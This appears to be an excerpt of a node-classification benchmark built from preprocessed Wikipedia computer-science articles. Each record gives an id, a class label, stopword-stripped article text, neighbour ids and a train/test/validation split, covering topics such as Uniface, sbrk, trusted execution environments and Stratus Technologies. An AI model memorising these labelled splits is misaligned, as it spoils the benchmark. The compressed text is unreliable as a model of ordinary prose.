support yahoo messenger account allowed ichat users text voice video chats using yahoo mail accounts also supported third-party plugins eventually allowing protocols compatible software ichat 6 last ichat version os x mountain lion replaced messages final release ichat 6.0.1 published february 1 2012 part os x mountain lion preview apple announced february 16 2012 os x messaging client would messages would support imessage protocol making compatible ios client messages also incorporates facetime support apple made messages immediately available downloadable beta version use mac os x 10.7. ichat aim support fully endorsed aol used official implementation aim oscar protocol using xmpp transport ichat could serve client aol instant messenger yahoo messenger mobileme icq xmpp ichat could also integrate google talk contacts xmpp pane
[ 10242, 10755, 9732, 9734, 4615, 1036, 1549, 5647, 1042, 3610, 10271, 3105, 6186, 6700, 4657, 1074, 8754, 8758, 576, 6208, 9802, 5713, 3670, 1623, 4184, 2141, 4702, 3681, 2149, 3691, 8303, 6771, 2676, 7292, 9343, 5251, 3719, 10888, 4746, 1...
Train
7,929
4
Cyber_Terror_Response_Center:cyber terror response center cyber terror response center abbr ctrc also 2007 known netan net+an meaning safety korean language cybercrime section korean national police agency south korea center established 2000 computer crime investigation squad established 1997 headquartered knpa main building july 2008 center 900 employees majority police officers specializing cybercrime investigations center investigates cybercrimes incidents cyber terrorism provides digital forensics services korean police 2012 center website stated year 80,000 incidents cybercrimes reported south korea cites 2006 breakdown fraud 41 intrusion malware 23 online defamation 10 illegal web content 8 copyright violations 3 crimes 15 examples center actions include campaign reduce online slander cyber bullying 2008 launched aftermath suicide actress choi jin-sil raid korean google offices investigate privacy issues concerning google street view service 2010 cracking online discussions bomb making 2011 busting illegal online gambling operation 2012 center hosts international conference annual symposium cyber terror international symposium cybercrime response inaugurated together center 2000 center numerous international connections interpol hotlines memorandums understandings number foreign cybercrime investigations agencies
[ 4945, 7515 ]
None
7,930
9
Uniface_(programming_language):uniface programming language uniface development deployment platform enterprise applications run large range runtime environments including mobile mainframe web service-oriented architecture soa windows java ee .net uniface model-driven rapid application development rad environment used create mission-critical applications uniface applications database- platform-independent uniface provides integration framework enables uniface applications integrate major dbms products oracle microsoft sql server mysql ibm db2 addition uniface also supports file systems rms hp openvms sequential files operating system text files wide range technologies mainframe-based products cics ims web services smtp pop email ldap directories .net activex component object model com c ++ programs java uniface operates microsoft windows windows mobile various flavors unix linux vms ibm iseries z/os uniface used complex systems maintain critical enterprise data supporting mission-critical business processes point-of sale web-based online shopping financial transactions salary administration inventory control currently used thousands companies 30 countries effective installed base millions end-users uniface applications range client/server web data entry workflow well portals accessed locally via intranets internet originally developed netherlands inside automation later uniface b.v. product company acquired detroit-based compuware corp 1994 2014 acquired marlin equity partners independent company uniface b.v. global headquarters amsterdam uniface development environment—an integrated collection tools modeling implementing compiling debugging distributing applications uniface applications including use common runtime infrastructure consisting addition uniface anywhere formerly uniface jti java thin client interface deliver client/server uniface applications computer connected internet thin client solution uniface procedural scripting language called uniface proc used code application behavior uniface automates input/output operations kernel default code much fundamental behavior need coded uniface applications component-based infrastructure-independent software programs create use data stored one databases file-systems composite applications include non-uniface components created using development tools deployed distributed client/server web environments mobile applications web services mainframe environments uniface variety component types intended use different layers multi-tier application architecture components presentation tier responsible user interface include components business logic tier handle business rules task-specific behavior user interface data access tier contains physical database structures captured uniface application model uniface ensures physical data access encapsulating sql dbms connectors network middleware access encapsulated middleware drivers uniface router runtime engine executes application components displays presentation components using appropriate user interface connector either gui character-based sends receives data via dbms connector uniface applications developed uniface development environment originally possible develop apple dec platforms windows supported platform development uniface applications development model-driven component-based data structure business rules default behavior application captured application model model definitions reused inherited components override inherited definitions provide component-specific behavior characteristics templates improve productivity enforce consistency defining models application model defines entities tables fields keys indexes relationships together referential integrity entity field model properties set triggers business rules added model declaratively setting properties procedurally adding proc code uniface procedural language triggers triggers containers code triggers represent user system events example occurrence gets focus read leave field others cover matters validation act place holders methods associated particular object use model-level triggers enables uniface collect properties behavior within business objects separating logical physical data structures makes possible define default behavior reuse throughout application speeding development facilitating 3-tier application architecture entity table first defined application model exported physical database form create table scripts objects described application model reused components developers embed objects model component drawing layout canvas presentation components inserting tree view component structure also add component-level objects application model control fields menus component variables properties triggers defined application model inherited copied component definitions changed component level provide specific functionality breaks link application model component although possible restore link model model code properties changed model level components holding object need recompiled collect new definitions provides benefits maintenance ensures rules associated object available wherever used uniface maintains database metadata purposes reuse—application models component definitions component layouts procedural code repository proprietary intended access via uniface development environment ensure repository integrity however repository structure documented making possible though recommended interface directly example reporting using centralized repository application development shared teams software developers uniface integrate version control system vcs supports microsoft common source code control interface specification vcs functionality available within uniface depends vcs used software vendors interpreted implemented ms cscc api differently uniface applications deployed platforms mainframe mobile without changing code components objects startup shells menus toolbars panels glyphs global included proc entries compiled runtime objects packaged zip files deployed onto platform runtime objects executed using virtual machine platform-specific interpreter java later followed uniface respect components compiled one machine executed another providing uniface virtual machine present uniface router uniface server make uniface scalable balanceable make possible run processes asynchronously uniface accesses many databases file systems supports means database connectors drivers dbms connectors map convert uniface data types suitable format particular storage medium runtime possible pass parameters invoke disable database-specific extensions provided database connector licensed possible convert different data sources uniface also provides api database connector interface used create proprietary connectors sql-based database licensing managed compuware distributed license manager dlm server based system distributing licenses clients request precluding need held locally originally called unis product created netherlands 1984 inside automation company headed bodo douqué frits kress technical director 1986 product company changed name uniface early logo product included red capital reflected red capital inside automation logo uniface developed principles american national standards institute ansi 3-schema architecture first proposed 1975 standard approach building database management systems consisting 3 schema metamodels uniface developed dec vax machine using native vax file-management system rms vestige still seen today ’ product continued use “ gold ” key change modes dec vt terminals actually gold yellow key keyboard today “ gold ” simply mapped numeric keyboard key function key early versions product bundled sybase rdbms name fastbuild although limited accessing database uniface continuously evolved handle new technologies application architectures critical success applications built uniface migrated updated modernized without losing original development investment uniface version 3 1986 uniface 3 first public release featured support multiple databases rms oracle c_isam ingres rdb virtual machine interpretation structure editor uniface text command editor uniface version 4 1988 uniface 4 improved text editor form editor improved printing display support introduced support ms-dos added case tool interface uniface version 5 1990 uniface 5 enabled client/server deployment introduction remote database access polyserver introduced graphical user interface via universal presentation interface upi database support extended total 13 databases file systems available dos vms os/2 stratus vos unix japanese character support also introduced uniface six 1994 uniface six completed move fully graphical development environments included graphical form painter application model editor improved deployment dynamic object libraries added support microsoft object linking embedding ole included support apple macintosh added permissions control integrated version control added personal series reporting tools although later removed 3rd party decided enhance product wider platform support uniface seven 1997 uniface seven focused component integration uniface external components introduction uniface request broker urb architecture urb supports bi-directional synchronous asynchronous communication components well remote data access added partitioned application servers messaging uniface seven also delivered first uniface web development deployment tools web application server uniface request dispatcher enhancements included new component types services server pages reports signature editor assembly workbench subsystems operations non-modal forms component instances improved editors navigation enhanced editor plug-in new debugger integrated online help component templates web application server improved validation uniface name server graphical partitioning manager uniface seven also saw introduction several tools uniface 8 2001 uniface 8 brought major changes area process integration uniface router uniface server provided scalable balanced deployment web request dispatcher wrd replaced urd improving performance support web services soap xml introduced connectivity interoperability improved method implementing 3-tier application architecture introduced connectors soap com corba mqseries added window file management improved new deployment utility introduced improving application distribution component subtypes 3-tier architecture added handles added component instances automatic garbage collection added uniface 9 2006 uniface 9 release focused gui usability improvements thin deployment integration support windows mobile added configuration deployment simplified using zipped archives support unicode improved already impressive multilingual capability improvements web development xml handling brought uniface line industry standards dynamic field movement form components removed old barriers flexibility features included improved color handling dynamic menus xml api diagram editor application model cross-referencing functionality support refactoring deployment enhanced web services functionality uniface 9.4 2010 despite point release uniface 9.4 introduced enough major new functionality considered major release major focus rich internet application ria functionality making possible develop web 2.0 applications rich functionality client/server applications using tools methodologies used develop classic client/server applications language locale support substantially improved support html email security encryption uniface 9.5 2011 release uniface 9.5 improved product ’ integration world wide web introduction javascript api together improvements means client-side processing bring benefits areas performance integration functionality user-friendliness session management capability extended offer improved security processing web services fully supports complex datatypes soap restful services also improvements customers business-critical client/server applications particularly area grid widget uniface 9.6 2012 uniface 9.6 provided significant overhaul uniface client server gui capabilities functionality included html5 control leveraging javascript apis originally delivered web enhanced tab control updates image handling buttons plus improvements form container control enables 'forms within forms enabling development dynamic user experiences addition gui enhancements uniface 9.6 also delivered enhancements uniface web web services capabilities including ability dynamically change scope web transactions web pagination hitlist processing improved wsdl xml capabilities uniface 9.7 2015 uniface 9.7 delivered significant enhancements development web applications including extensions facilitate development deployment mobile applications based hybrid application enhancing multi-channel development/deployment capability uniface significantly extended uniface 9.7.02 release may 2016 providing integration build service provider enable hybrid applications packaged distribution via google play apple store addition mobile web enhancements uniface 9.7 delivered integration client server enhancements ms windows 10 uniface development environment ude modernized new look feel providing new look front screen refreshed visual user experience approach uniface took modernize ude shared developer conferences community website uniface.info help advise promote client server modernization existing customer base uniface 9.7 provides two new database drivers enabling connectivity postgresql sap hana uniface 10 2015 uniface 10 delivered rewritten development environment based core concepts integrated development environments ide initial release positioned preview early adopter release showed significant change proprietary development style highly productive implementation industry standard development enabling development web applications may 2015 first edition uniface 10 released early adopters test develop web applications full enterprise edition uniface 10 released september 2016 delivering mobile client server development migration path enable existing customer base move applications uniface 10
[ 4107, 6797, 11024, 5397, 11030, 10020, 10026, 5677, 10413, 7983, 11187, 9909, 823, 4042, 11604, 8539, 10340, 3560, 7022, 5492, 2168, 4604, 2045 ]
Train
7,931
9
Roberto_Ierusalimschy:roberto ierusalimschy roberto ierusalimschy born may 21 1960 brazilian computer scientist known creating lua programming language holds ph.d computer science pontifical catholic university rio de janeiro appointment associate professor informatics post-doc university waterloo 1992 visiting professor stanford university 2012 leading architect author programming lua .. also responsible creating lpeg lua library implementing parsing expression grammars
[ 4777, 8057, 8262, 5783 ]
None
7,932
4
Microsoft_Tape_Format:microsoft tape format microsoft tape format mtf tape format used several backup tools microsoft windows platform notable examples include microsoft ntbackup program backup exec backup utilities included microsoft sql server several open source utilities written read mtf non-windows platforms
[ 1801, 6797, 11030 ]
None
7,933
2
Sbrk:sbrk brk sbrk basic memory management system calls used unix unix-like operating systems control amount memory allocated data segment process functions typically called higher-level memory management library function malloc original unix system brk sbrk ways applications could acquire additional data space later versions allowed also done using mmap call brk sbrk calls dynamically change amount space allocated data segment calling process change made resetting program break process determines maximum space allocated program break address first location beyond current end data region amount available space increases break value increases available space initialized value zero break value automatically rounded size appropriate memory management architecture brk subroutine sets program break value value end_data_segment parameter changes amount available space accordingly sbrk subroutine adds program break value number bytes contained increment parameter changes amount available space accordingly increment parameter negative number case amount available space decreased set increment parameter zero fetch current value program break upon successful completion brk subroutine returns value 0 sbrk subroutine returns prior value program break available space increased prior value also points start new area either subroutine unsuccessful value returned errno global variable set indicate error current mac os x implementation sbrk emulation maximum allocation 4 megabytes limit reached −1 returned errno set enomem error enomem set allocated space remains unchanged one following true
[ 1152, 8545, 2627, 4423, 4968, 10407, 5492, 5397, 7933 ]
Train
7,934
4
Buck-security:buck-security buck-security security scanner linux first released june 2009 originally designed system administrators maintaining debian ubuntu servers program runs security checks like looking worldwriteable files directories listening services unwanted installed packages version 0.5 checksum feature included creates encrypted list checksums important system files buck-security claims concentrate important checks therefore usable security scanners like lynis tiger april 2010 buck-security featured sourceforge blog july 2013 added yocto project 20
[ 5612, 7983, 8399, 5492, 4309, 823 ]
Train
7,935
7
Open_Grid_Forum:open grid forum open grid forum ogf community users developers vendors standardization grid computing formed 2006 merger global grid forum enterprise grid alliance ogf models process internet engineering task force ietf produces documents many acronyms ogsa ogsi jsdl ogf two principal functions plus administrative function standards organization grid computing building communities within overall grid community including extending within academia industry function areas divided groups three types working groups generally tightly defined role usually producing standard research groups looser role bringing together people discuss developments within field generate use cases spawn working groups community groups restricted community functions three meetings organized per year divided approximately evenly averaging number years north america europe east asia many working groups organize face-to-face meetings interim concept forum bring together developers practitioners users distributed computing known grid computing time discussed birds feather session november 1998 sc98 supercomputing conference based response idea bof ian foster bill johnston convened first grid forum meeting nasa ames research center june 1999 drawing roughly 100 people mostly us group organizers nominated charlie catlett argonne national laboratory university chicago serve initial chair confirmed via plenary vote held 2nd grid forum meeting chicago october 1999 advice assistance internet engineering task force ietf ogf established process based ietf ogf managed steering group 1998 groups similar grid forum began organize europe called egrid japan discussions among leaders groups resulted combining form global grid forum met first time amsterdam march 2001 ggf-1 amsterdam followed five grid forum meetings catlett served ggf chair two 3-year terms succeeded mark linesch hewlett packard september 2004 enterprise grid alliance ega formed 2004 focused large data center businesses emc corporation netapp oracle corporation ggf-18 23rd gathering forum counting first five gf meetings september 2006 ggf became open grid forum ogf based merger ega september 2007 craig lee aerospace corporation became chair technologies specified ogf include addition technical standards ogf published community-developed informational experimental documents first version drmaa api implemented sun grid engine also university wisconsin-madison program condor cycle scavenger separate globus alliance maintains implementation standards globus toolkit release unicore based ogsa architecture jsdl
[ 10625, 8702, 11658, 4107, 10641, 531, 9876, 2710, 158, 5414, 10413, 3502, 1076, 6651, 8892, 7615, 5956, 7364, 198, 1607, 4052, 9301, 11353, 222, 479, 8030, 9441, 105, 7018, 4091, 7294 ]
Test
7,936
4
Trusted_execution_environment:trusted execution environment trusted execution environment tee secure area main processor guarantees code data loaded inside protected respect confidentiality integrity tee isolated execution environment provides security features isolated execution integrity applications executing tee along confidentiality assets general terms tee offers execution space provides higher level security rich operating system os functionality 'secure element se open mobile terminal platform omtp first defined tee advanced trusted environment omtp tr1 standard defining set hardware software components providing facilities necessary support applications meet requirements one two defined security levels first security level profile 1 targeted software attacks profile 2 targeted software hardware attacks commercial tee solutions based arm trustzone technology conformed tr1 standard trusted foundations developed trusted logic later launched work omtp standards ended mid 2010 group transitioned wholesale applications community wac omtp standards including defining tee hosted gsma tee isolated environment runs parallel operating system providing security rich environment intended secure user-facing os offers higher level performance functionality secure element se using hybrid approach utilizes hardware software protect data therefore offers level security sufficient many applications trusted applications running tee access full power device main processor peripherals memory hardware isolation protects user installed apps running main operating system software cryptographic isolation inside tee protect trusted applications contained within service providers mobile network operators mno operating system developers application developers device manufacturers platform providers silicon vendors main stakeholders contributing standardization efforts around tee prevent simulation hardware user-controlled software so-called hardware root trust used set private keys so-called endorsement keys provisioned secrets embedded directly chip manufacturing one-time programmable memory efuses usually used despite large area chip take changed whose public counterparts reside manufacturer database together non-secret hash public key belonging trusted party usually chip vendor used sign trusted firmware alongside circuits cryptographic operations controlling access hardware designed way prevents software signed trusted party key accessing privileged features public key vendor provided runtime hashed hash compared one embedded chip hash matches public key used verify digital signature trusted vendor-controlled firmware chain bootloaders android devices 'architectural enclaves sgx trusted firmware used implement remote attestation untrusted component application required attested loads trusted one memory trusted application protected modification untrusted components hardware nonce requested untrusted party verifier server used part cryptographic authentication protocol proving integrity trusted application proof passed verifier verifies valid proof computed simulated hardware i.e qemu order construct access keys baked hardware required trusted firmware access keys and/or keys derived obtained using platform owner meant access data recorded foundry verifying party must interact service set vendor scheme implemented improperly chip vendor track applications used chip selectively deny service returning message indicating authentication passed simulate hardware way enables pass remote authentication attacker would extract keys hardware costly equipment reverse-engineering skills required focused ion beam scanning electron microscope microprobing decapsulation even impossible hardware designed way reverse-engineering destroys keys cases keys unique piece hardware key extracted one chip useless another ones though deprivation ownership inherent property tees possible design system way allows user obtained ownership device first control system practice systems consumer electronics intentionally designed allow chip manufacturers control access attestation algorithms allows manufacturers grant access tees software developers usually commercial business agreement manufacturer enable use cases tivoization drm number use cases tee though possible use cases exploit deprivation ownership tee usually used exactly note much tee literature covers topic definition premium content protection preferred nomenclature many copyright holders premium content protection specific use case digital rights management drm controversial among communities free software foundation .it widely used copyrights holders restrict ways end users consume content 4k high definition films tee suitable environment protecting digitally encoded information example hd films audio connected devices smart phones tablets hd televisions suitability comes ability tee deprive owner device reading stored secrets fact often protected hardware path tee display and/or subsystems devices tee used protect content device content protected transmission streaming use encryption tee protects content decrypted device ensuring decrypted content exposed environment approved app developer platform vendor mobile commerce applications mobile wallets peer-to-peer payments contactless payments using mobile device point sale pos terminal often well-defined security requirements tees used often conjunction near field communication nfc ses trusted backend systems provide security required enable financial transactions take place scenarios interaction end user required may require user expose sensitive information pin password biometric identifier mobile os means authenticating user tee optionally offers trusted user interface used construct user authentication mobile device tee well-suited supporting biometric id methods facial recognition fingerprint sensor voice authorization may easier use harder steal pins passwords authentication process generally split three main stages tee good area within mobile device house matching engine associated processing required authenticate user environment designed protect data establish buffer non-secure apps located mobile os additional security may help satisfy security needs service providers addition keeping costs low handset developers tee used governments enterprises cloud service providers enable secure handling confidential information mobile devices server infrastructure tee offers level protection software attacks generated mobile os assists control access rights achieves housing sensitive ‘ trusted ’ applications need isolated protected mobile os malicious malware may present utilizing functionality security levels offered tee governments enterprises assured employees using devices secure trusted manner likewise server-based tees help defend internal external attacks backend infrastructure rise software assets reuses modular programming productive process design software architecture decoupling functionalities small independent modules module contains everything necessary execute desired functionality tee allows organize complete system featuring high level reliability security preventing module vulnerabilities others order modules communicate share data tee provide means securely payloads sent/received modules using mechanisms objects serialization conjunction proxies see component-based software engineering following hardware technologies used support tee implementations
[ 11588, 3337, 7212, 9964, 1776, 2416, 2224, 2259, 1945, 7354, 3323, 5918, 9311 ]
None
7,937
7
OnApp:onapp onapp london uk-based software company software enables service providers build operate sell iaas public cloud private cloud content delivery network services onapp also operates onapp federation wholesale cloud infrastructure marketplace enables service providers buy sell cloud infrastructure managed onapp software enables enterprises adopt hybrid cloud model combining on-premises cloud infrastructure public cloud resources onapp founded 2010 onapp partnerships include 8 august 2011 onapp announced acquisition aflexi cdn management software company 16 september 2014 onapp announced acquisition solusvm virtual server management software company 7 june 2018 solusvm acquired onapp plesk
[ 10368, 4194, 6153, 2795, 1400 ]
None
7,938
2
Comparison_of_netbook-oriented_Linux_distributions:comparison netbook-oriented linux distributions netbooks small laptops screen sizes approximately 7 12 inches low power consumption use either ssd solid state disk hdd hard disk drive storage 2 gigabytes ram often less lack optical disk drive usually usb ethernet wifi often bluetooth connectivity name emphasizes use portable internet appliances special linux distributions called netbook distributions machines distributions purport optimized use small low-resolution displays tend include broad mix voip web-focused tools including proprietary applications rarely seen installed default mainstream desktop distributions instance nokia maemo asus customized xandros ship skype adobe flash installed ubuntu netbook edition offers option oems public numbers measuring install-base operating systems available google trends data handful indicate relative popularity
[ 2560, 5644, 5139, 9237, 10780, 4637, 3618, 9257, 1584, 5681, 9266, 10817, 8772, 10820, 2134, 5721, 3162, 2658, 6244, 6763, 10860, 9851, 11391, 7812, 8326, 10382, 657, 2195, 9882, 6301, 1694, 10933, 9407, 4803, 6352, 3289, 3802, 10464, 1761,...
Validation
7,939
3
Stratus_Technologies:stratus technologies stratus technologies inc. major producer fault tolerant computer servers software company founded 1980 stratus computer inc. natick massachusetts adopted present name 1999 current ceo president dave laurello stratus technologies inc. privately held company owned solely siris capital group parent company stratus technologies bermuda holdings ltd. incorporated bermuda stratus computer marlborough massachusetts based producer fault tolerant minicomputers competed computers tandem computers lesser extent digital equipment corporation vax starting 1983 computers resold worldwide olivetti cps/32 brand 1985 1993 computers resold ibm ibm system/88 brand company based maynard massachusetts stratus shipped first computer february 1982 short 21 months founding customer west lynn creamery located nearby lynn massachusetts initial customer verified stratus strategy competing tandem computers company pioneered general purpose fault tolerant industry west lynn creamery planned purchasing tandem switched stratus learning product company traditional markets financial services companies banks stock exchanges beginning 1990s company moved telecommunications industry particularly area network management custom services result telecommunications revenues surpassed enterprise computing led buyout company ascend communications 1998 later acquired lucent technologies enterprise server portion business little interest ascend portion spun management buyout 1999 funding international investment firm investcorp company named stratus technologies inc. privately held stratus technologies inc. owned siris capital group acquired company april 28 2014 second quarter 2002 lucent sold telecom product lines originally came stratus platinum equity buyout firm based los angeles unit eventually named cemprus llc stratus purchased cemprus 2003 wholly owned subsidiary stratus acquisition gave stratus ss7 signaling software phone networks intelligent gateway software traditional ip voice equipment able communicate software used support higher-level telephony applications calling-card toll free phone number services 2006 stratus purchased emergent network solutions allen texas stratus sold emergent 2009 emergent known stratus telecommunications two companies separate entities one parent july 16 2010 reverse merger ymax vocaltec stratus telecommunications technologies owned vocaltec 2012 stratus acquired assets products services intellectual property marathon technologies along customer base channel-partner network legacy product line originally based motorola mc68000 processors ft xa series migrated intel i860 processors xa/r series hewlett-packard pa-risc processors continuum series finally intel xeon processors v series line runs vos operating system originally many features inspired derived multics operating systems supported legacy platforms xa/r jetta continuum —hp-ux home-grown unix product called ftx fault-tolerant unix —are supported longer actively sold june 2002 stratus introduced ftserver line intel-based servers running microsoft windows 2000 higher stratus ftserver line sold today supports windows 2000 2003 2008 well red hat enterprise linux company sells models ftserver designated entry-level mid-range enterprise-class fault tolerant servers mid-range enterprise ftserver systems also run vmware vsphere virtualization software company began offering stratus avance software june 2008 high availability product virtualization built avance runs two general-purpose x86 servers allows deployment applications across high-availability virtual machines freeing existing x86 servers two servers comprising avance high-availability platform may separated three miles purposes disaster recovery business continuity avance intended serve small-to-medium size businesses need affordable simple high availability virtualization stratus large presence maynard massachusetts u.s. headquarters phoenix arizona well several worldwide offices locations uk netherlands south africa france germany italy spain australia new zealand singapore hong kong china japan company vast customer base popular types customers include banks credit unions emergency response centers 911 usa police departments fire departments hospitals clinics governments credit card companies stock exchanges telcos/phone companies internet providers
[ 6529, 2179, 7269, 1606, 4424, 5384, 8233, 8944, 6772, 11604, 1750, 8502, 8729, 9946, 3323 ]
None
7,940
9
Basic_block:basic block compiler construction basic block straight-line code sequence branches except entry branches except exit restricted form makes basic block highly amenable analysis compilers usually decompose programs basic blocks first step analysis process basic blocks form vertices nodes control flow graph code basic block circumstances whenever first instruction basic block executed rest instructions necessarily executed exactly order code may source code assembly code sequence instructions formally sequence instructions forms basic block definition general intuitive one ways example allows unconditional jumps labels targeted jumps definition embodies properties make basic blocks easy work constructing algorithm blocks control may transfer reaching end block called block successors blocks control may come entering block called block predecessors start basic block may jumped one location algorithm generating basic blocks listing code simple analyser scans code marking block boundaries instructions may either begin end block either transfer control accept control another point listing simply cut points basic blocks remain note method always generate maximal basic blocks formal definition usually sufficient maximal basic blocks basic blocks extended including adjacent blocks without violating definition basic block input sequence instructions mostly three-address code output list basic blocks three-address statement exactly one block step 1 identify leaders code leaders instructions come following 3 categories step 2 starting leader set following instructions including next leader basic block corresponding starting leader thus every basic block leader instructions end basic block include following instructions begin new basic block include following note control never pass end basic block block boundaries may modified finding basic blocks particular fall-through conditional branches must changed two-way branches function calls throwing exceptions must unconditional jumps added may require adding labels beginning blocks
[ 1952, 6818, 6821, 4695, 7941, 10796, 7245, 3854, 6478, 7438, 10734, 2262, 951, 3960, 2619, 2620, 2045, 4030 ]
None
7,941
9
Binary_translation:binary translation computing binary translation form binary recompilation sequences instructions translated source instruction set target instruction set cases instruction set simulation target instruction set may source instruction set providing testing debugging features instruction trace conditional breakpoints hot spot detection two main types static dynamic binary translation translation done hardware example circuits cpu software e.g run-time engines static recompiler emulators binary translation motivated lack binary target platform lack source code compile target platform otherwise difficulty compiling source target platform statically-recompiled binaries run potentially faster respective emulated binaries emulation overhead removed similar difference performance interpreted compiled programs general translator using static binary translation aims convert code executable file code runs target architecture without run code first done dynamic binary translation difficult correctly since code discovered translator example parts executable may reachable indirect branches whose value known run-time one static binary translator uses universal superoptimizer peephole technology developed sorav bansal alex aiken stanford university perform efficient translation possibly many source target pairs considerably low development costs high performance target binary experiments powerpc-to-x86 translations binaries even outperformed native versions average ran two-thirds native speed honeywell provided program called liberator honeywell 200 series computers could translate programs ibm 1400 series computers programs honeywell 200 series 2014 arm architecture version 1998 video game starcraft generated static recompilation additional reverse engineering original x86 version pandora handheld community capable developing required tools achieving translations successfully several times instance successful x86-to-x64 static recompilation generated procedural terrain generator video game cube world 2014 another example nes-to-x86 statically recompiled version videogame super mario bros. generated usage llvm 2013 2004 scott elliott phillip r. hutchinson nintendo developed tool generate c code game boy binary could compiled new platform linked hardware library use airline entertainment systems 1995 norman ramsey bell communications research mary f. fernandez department computer science princeton university developed new jersey machine-code toolkit basic tools static assembly translation dynamic binary translation looks short sequence code—typically order single basic block—then translates caches resulting sequence code translated discovered possible branch instructions made point already translated saved code memoization dynamic binary translation differs simple emulation eliminating emulator main read-decode-execute loop—a major performance bottleneck paying large overhead translation time overhead hopefully amortized translated code sequences executed multiple times advanced dynamic translators employ dynamic recompilation translated code instrumented find portions executed large number times portions optimized aggressively technique reminiscent jit compiler fact compilers e.g sun hotspot technology viewed dynamic translators virtual instruction set bytecode real one
[ 7940, 5384, 6153, 8712, 8716, 4112, 1042, 5523, 10516, 1304, 8609, 6818, 8868, 9774, 7983, 823, 11447, 2620, 10173, 9665, 7234, 1606, 3142, 2635, 7755, 11596, 2638, 3791, 11604, 11221, 4695, 9309, 1632, 11624, 9707, 9964, 9455, 8944, 499, ...
None
7,942
7
Stanford_DASH:stanford dash stanford dash cache coherent multiprocessor developed late 1980s group led anoop gupta john l. hennessy mark horowitz monica s. lam stanford university based adding pair directory boards designed stanford 16 sgi iris 4d power series machines cabling systems mesh topology using stanford-modified version torus routing chip boards designed stanford implemented directory-based cache coherence protocol allowing stanford dash support distributed shared memory 64 processors stanford dash also notable supporting helping formalize weak memory consistency models including release consistency stanford dash first operational machine include scalable cache coherence influenced subsequent computer science research well commercially available sgi origin 2000 stanford dash included 25th anniversary retrospective selected papers international symposium computer architecture several computer science books simulated university edinburgh used case study contemporary computer science classes
[ 2264, 5464, 5272, 3863 ]
Test
7,943
5
Line_Mode_Browser:line mode browser line mode browser also known lmb wwwlib www second web browser ever created browser first demonstrated portable several different operating systems operated simple command-line interface could widely used many computers computer terminals throughout internet browser developed starting 1990 supported world wide web consortium w3c example test application libwww library one fundamental concepts world wide web projects cern universal readership 1990 tim berners-lee already written first browser worldwideweb later renamed nexus program worked proprietary software next computers limited use berners-lee team could port worldwideweb application features—including graphical wysiwyg editor— widely deployed x window system since experience programming team recruited nicola pellow math student intern working cern write passive browser basic could run computers time name line mode browser refers fact ensure compatibility earliest computer terminals teletype machines program displayed text images line-by-line text input cursor positioning development started november 1990 browser demonstrated december 1990 development environment used resources priam project french language acronym projet interdivisionnaire d'assistance aux microprocesseurs project standardise microprocessor development across cern short development time produced software simplified dialect c programming language official standard ansi c yet available platforms line mode browser released limited audience vax rs/6000 sun-4 computers march 1991 release first publicly available version integrated cern program library cernlib used mostly high-energy physics-community first beta browser released 8 april 1991 berners-lee announced browser availability august 1991 alt.hypertext newsgroup usenet users could use browser anywhere internet telnet protocol info.cern.ch machine also first web server spreading news world wide web 1991 increased interest project cern laboratories desy germany elsewhere throughout world first stable version 1.1 released january 1992 since version 1.2l released october 1992 browser used common code library later called libwww main developer pellow started working macwww project browsers began share source code may 1993 world wide web newsletter berners-lee announced browser released public domain reduce work new clients 21 march 1995 release version 3.0 cern put full responsibility maintaining line mode browser w3c line mode browser libwww library closely tied together—the last independent release separate browser component 1995 browser became part libwww agora world wide web email browser based line mode browser line mode browser popular beginning web since web browser available operating systems statistics january 1994 show mosaic quickly changed web browser landscape 2 world wide web users browsed line mode browser new niche text-only web browser filled lynx made line mode browser largely irrelevant browser one reason lynx much flexible line mode browser became test application libwww simplicity line mode browser several limitations line mode browser designed work operating system using called dumb terminals user interface simple possible user began command-line interface specifying uniform resource locator url requested web page printed line line screen like teleprinter websites displayed using first versions html formatting achieved capitalization indentation new lines header elements capitalized centered separated normal text empty lines navigation controlled pointing device mouse arrow keys text commands typed program numbers brackets displayed link links opened typing corresponding number program led one journalist time write web way finding information typing numbers page scrolled empty command carriage return entered scrolled command codice_1 command codice_2 navigated backwards history new pages navigated codice_3 go url browser authoring functions pages could read edited considered unfortunate robert cailliau one developers think retrospect biggest mistake made whole project public release line-mode browser gave internet hackers immediate access point view passive browser — editing capabilities line mode browser designed able platform independent official ports apollo/domain ibm rs6000 decstation/ultrix vax/vms vax/ultrix ms-dos unix windows classic mac os linux mvs vm/cms freebsd solaris macos browser supports many protocols like file transfer protocol ftp gopher hypertext transfer protocol http network news transfer protocol nntp wide area information server wais features included rlogin telnet hyperlinks cyrillic support added 25 november 1994 version 2.15 ability set proxy client browser could run background process download files line mode browser problems recognizing character entities properly collapsing whitespace supporting tables frames
[ 513, 6657, 9736, 2579, 7188, 6171, 9757, 7713, 3110, 10791, 9770, 559, 7217, 4661, 3639, 10808, 3643, 9275, 64, 576, 5707, 10834, 6231, 8281, 6747, 1642, 9834, 9841, 115, 9843, 4213, 4725, 6775, 3191, 4728, 119, 124, 637, 7806, 1664, 21...
Validation
7,944
8
Orion_Application_Server:orion application server orion application server java ee application server developed swedish company ironflare ab founded magnus stenman karl avedal first released 1999 orion claims first commercially available application server full java ee support current stable version 2.0.7 compliant java ee version 1.3 oracle corporation acquired license source orion 2001 developed oracle application server containers java ee oc4j oc4j documentation contains reference orion server orion developers involved maintenance enhancements source oracle ironflare became official java ee licensee 2003 enabled access sun microsystems compatibility testing tools ensure correct implementation java ee specification orion orion product ironflare hence orion marketed company
[ 4233, 9665 ]
Validation
7,945
9
OxMetrics:oxmetrics oxmetrics econometric software including ox programming language econometrics statistics developed jurgen doornik david hendry oxmetrics originates pcgive one first econometric software personal computers initiated david hendry 1980s london school economics oxmetrics builds ox programming language jurgen doornik developed university oxford describes history econometric software packages oxmetrics family software packages econometric financial analysis time series forecasting econometric model selection statistical analysis cross-sectional data panel data main modules apart pcgive dynamic econometric models ardl var garch switching autometrics panel data models dpd limited dependent models stamp structural time series modelling ssfpack state space methods g rch financial volatility modelling present many empirical examples pcgive oxmetrics econometrics textbook give modern examples time series analysis textbook
[ 5129, 3980, 2317, 6797, 7950, 2457, 7580, 7326, 7983, 6962, 823, 6718, 5830, 5703, 4808, 5833, 5450, 8262, 2000, 9944, 2652, 10848, 4840, 10472, 363, 5612, 7924 ]
None
7,946
1
